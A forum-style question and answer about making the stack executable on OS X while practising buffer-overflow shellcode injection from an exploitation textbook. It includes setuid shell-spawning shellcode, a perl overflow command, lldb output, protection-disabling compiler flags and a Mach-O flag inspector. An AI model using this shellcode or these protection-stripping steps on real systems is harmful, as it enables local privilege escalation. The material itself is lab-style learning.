How can you make the stack executable on OS X?

I am currently working through "Hacking: The Art of Exploitation" and am practicing shellcode injection against some example code I wrote.

I am injecting the shellcode as an environment variable. In lldb I can see that I am overwriting the return address and that EIP is set to the middle of my NOP sled. However, it then throws "EXC_BAD_ACCESS" and segfaults.

Here is the section of the stack containing my shellcode:

0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xfffff
f90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"

Invoking lldb ./notesearch $(perl -e 'print "\x5e\xfc\xff\xbf"x40') to trigger the buffer overflow, this is what we get at the segfault:

Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
    frame #0: 0xbffffc5e
->  0xbffffc5e: nop    
    0xbffffc5f: nop    
    0xbffffc60: nop    
    0xbffffc61: nop    

I am compiling the code with gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer, and I am using the change_mach_o_flags.py script with the --no-pie and --executable-heap options set.

I think the problem is that OS X automatically makes the stack non-executable. Unfortunately, there does not seem to be a -z execstack option for gcc on OS X. There is no execstack utility available either.

I have searched online but cannot find any way to make the stack executable in my compiled code. Is there a way to do this, and if so, how?

From the Apple developer documentation:

There are two ways to make the stack and heap executable:

Pass the -allow_stack_execute flag to the compiler. This makes the stack (not the heap) executable.

Use the mprotect system call to mark specific memory pages as executable. The details are beyond the scope of this document. For more information, see the manual page for mprotect.

See: https://developer.apple.com/library/content/documentation/Security/Conceptual/SecureCodingGuide/Articles/BufferOverflows.html
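As an added example (not part of the question or answer above, and not Apple's code): the two protections the question is fighting, plus the one the answer's first option enables, are all recorded as bits in the Mach-O header, so the quickest way to audit a binary is to read those bits. The C inspector below parses a mach_header / mach_header_64 from a byte buffer and reports MH_PIE, MH_NO_HEAP_EXECUTION and MH_ALLOW_STACK_EXECUTION. The constants mirror Apple's <mach-o/loader.h> and are defined locally so the program builds on any platform; the two sample headers are constructed inline, and the "stock" versus "lab" flag sets are my assumptions about what a default link and a deliberately weakened build look like. Note that -allow_stack_execute is an ld64 option, so from clang or gcc it is passed as -Wl,-allow_stack_execute; on a real file, otool -hv ./notesearch prints the same flag names this tool reports.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Mach-O header constants, mirroring Apple's <mach-o/loader.h>, defined here
 * so the inspector compiles on any platform. */
#define MH_MAGIC                 0xfeedfaceu  /* 32-bit header, host byte order */
#define MH_CIGAM                 0xcefaedfeu  /* 32-bit header, byte-swapped    */
#define MH_MAGIC_64              0xfeedfacfu
#define MH_CIGAM_64              0xcffaedfeu
#define MH_EXECUTE               0x2u         /* filetype: main executable      */
#define MH_NOUNDEFS              0x1u
#define MH_DYLDLINK              0x4u
#define MH_TWOLEVEL              0x80u
#define MH_ALLOW_STACK_EXECUTION 0x20000u     /* set by ld -allow_stack_execute */
#define MH_PIE                   0x200000u    /* ASLR for the main image        */
#define MH_NO_HEAP_EXECUTION     0x1000000u   /* heap pages mapped non-exec     */

struct macho_hardening {
    int valid;          /* 1 if the buffer starts with a Mach-O header */
    int is64;
    uint32_t filetype;
    uint32_t flags;
    int pie;            /* MH_PIE present                   */
    int exec_stack;     /* MH_ALLOW_STACK_EXECUTION present */
    int noexec_heap;    /* MH_NO_HEAP_EXECUTION present     */
};

/* Read a 32-bit field, byte-swapping when the magic showed the file is in the
 * opposite byte order to the host. */
static uint32_t rd32(const uint8_t *p, int swap) {
    uint32_t v;
    memcpy(&v, p, 4);
    if (swap)
        v = (v >> 24) | ((v >> 8) & 0xff00u) | ((v & 0xff00u) << 8) | (v << 24);
    return v;
}

/* Parse only the mach_header / mach_header_64 at the start of `buf`. */
struct macho_hardening inspect_macho(const uint8_t *buf, size_t len) {
    struct macho_hardening h;
    int swap = 0;
    memset(&h, 0, sizeof h);
    if (len < 28) return h;                  /* shorter than a 32-bit header */
    switch (rd32(buf, 0)) {
        case MH_MAGIC:    break;
        case MH_MAGIC_64: h.is64 = 1; break;
        case MH_CIGAM:    swap = 1; break;
        case MH_CIGAM_64: h.is64 = 1; swap = 1; break;
        default:          return h;          /* not a thin Mach-O (fat, ELF, ...) */
    }
    if (h.is64 && len < 32) return h;
    h.valid       = 1;
    h.filetype    = rd32(buf + 12, swap);    /* magic, cputype, cpusubtype, filetype */
    h.flags       = rd32(buf + 24, swap);    /* ..., ncmds, sizeofcmds, flags        */
    h.pie         = (h.flags & MH_PIE) != 0;
    h.exec_stack  = (h.flags & MH_ALLOW_STACK_EXECUTION) != 0;
    h.noexec_heap = (h.flags & MH_NO_HEAP_EXECUTION) != 0;
    return h;
}

static void put32(uint8_t *out, uint32_t v, int big_endian) {
    for (int b = 0; b < 4; b++)
        out[b] = (uint8_t)(v >> (big_endian ? 8 * (3 - b) : 8 * b));
}

/* Constructed sample: a 28-byte 32-bit x86 MH_EXECUTE header carrying `flags`. */
static void make_header32(uint8_t out[28], uint32_t flags, int big_endian) {
    const uint32_t fields[7] = { MH_MAGIC, 7 /* CPU_TYPE_X86 */, 3 /* CPU_SUBTYPE_I386_ALL */,
                                 MH_EXECUTE, 0, 0, flags };
    for (int i = 0; i < 7; i++) put32(out + 4 * i, fields[i], big_endian);
}

/* Build a constructed header and inspect it in one call. */
struct macho_hardening inspect_constructed32(uint32_t flags, int big_endian) {
    uint8_t buf[28];
    make_header32(buf, flags, big_endian);
    return inspect_macho(buf, sizeof buf);
}

void print_report(const char *name, struct macho_hardening h) {
    if (!h.valid) { printf("%s: not a Mach-O header\n", name); return; }
    printf("%s: %s-bit, filetype=%u, flags=0x%x\n",
           name, h.is64 ? "64" : "32", (unsigned)h.filetype, (unsigned)h.flags);
    printf("  PIE (ASLR)          : %s\n", h.pie ? "yes" : "NO");
    printf("  executable stack    : %s\n", h.exec_stack ? "YES (MH_ALLOW_STACK_EXECUTION)" : "no");
    printf("  non-executable heap : %s\n", h.noexec_heap ? "yes" : "NO");
}

int main(void) {
    /* Assumed flag sets: a stock ld64 link versus a deliberately weakened lab
     * binary (PIE and heap protection cleared, stack execution allowed). */
    uint32_t stock = MH_NOUNDEFS | MH_DYLDLINK | MH_TWOLEVEL | MH_PIE | MH_NO_HEAP_EXECUTION;
    uint32_t lab   = MH_NOUNDEFS | MH_DYLDLINK | MH_TWOLEVEL | MH_ALLOW_STACK_EXECUTION;
    print_report("stock build", inspect_constructed32(stock, 0));
    print_report("lab build",   inspect_constructed32(lab, 0));
    return 0;
}
```

The inspector looks only at the header, which is enough for these three flags; a fat (universal) binary starts with a different magic and would need its per-architecture slices located first. Because the byte order is taken from the magic, the same code reads files produced for either endianness regardless of the host it runs on.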